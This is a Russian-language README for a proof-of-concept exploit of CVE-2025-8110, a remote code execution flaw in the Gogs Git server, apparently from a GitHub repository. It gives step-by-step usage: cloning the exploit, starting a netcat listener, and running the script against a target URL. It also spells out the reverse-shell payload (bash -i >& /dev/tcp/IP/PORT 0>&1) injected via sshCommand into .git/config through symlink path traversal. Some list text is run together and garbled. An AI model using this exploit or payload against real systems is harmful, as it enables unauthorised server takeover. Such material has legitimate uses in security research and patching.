
Эксплойт доказательства концепции для CVE-2025-8110 — уязвимости удалённого выполнения кода (RCE) в Gogs, использующей обход пути через символические ссылки и инъекцию sshCommand для доставки reverse shell.
Доказательство концепции (PoC) для CVE-2025-8110, критической уязвимости в Gogs, которая позволяет выполнять удалённый код (RCE) через манипуляции с .git/config с помощью обхода символических ссылок и инъекции sshCommand.
Этот эксплойт нацелен на недостаток Path Traversal в API управления контентом Gogs. Аутентифицированный пользователь может:
.git/config.sshCommand для выполнения Reverse Shell, когда сервер выполняет Git-операции.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Install dependencies:
pip3 install -r requirements.txt
Запустите ваш слушатель:
nc -lvnp 6666
Запустите эксплойт:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Аргументы:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Когда Gogs выполняет Git-команду, требующую сетевого транспорта (например, синхронизацию зеркала или внутреннюю проверку ссылок), он вызывает sshCommand, что запускает обратную оболочку.
| Аргумент | Описание |
|---|
-u, --url | Базовый URL целевого экземпляра Gogs (например, http://target.htb:3000). |
-lh, --host | IP-адрес атакующего (LHOST), на который будет подключаться обратная оболочка. |
-lp, --port | Порт прослушивания (LPORT), настроенный на вашей машине. |
-p, --password | Пароль для учётной записи pwnuser для выполнения аутентификации. |
-x, --proxy | (Необязательно) Направляет трафик через локальный прокси (по умолчанию: http://localhost:8080). |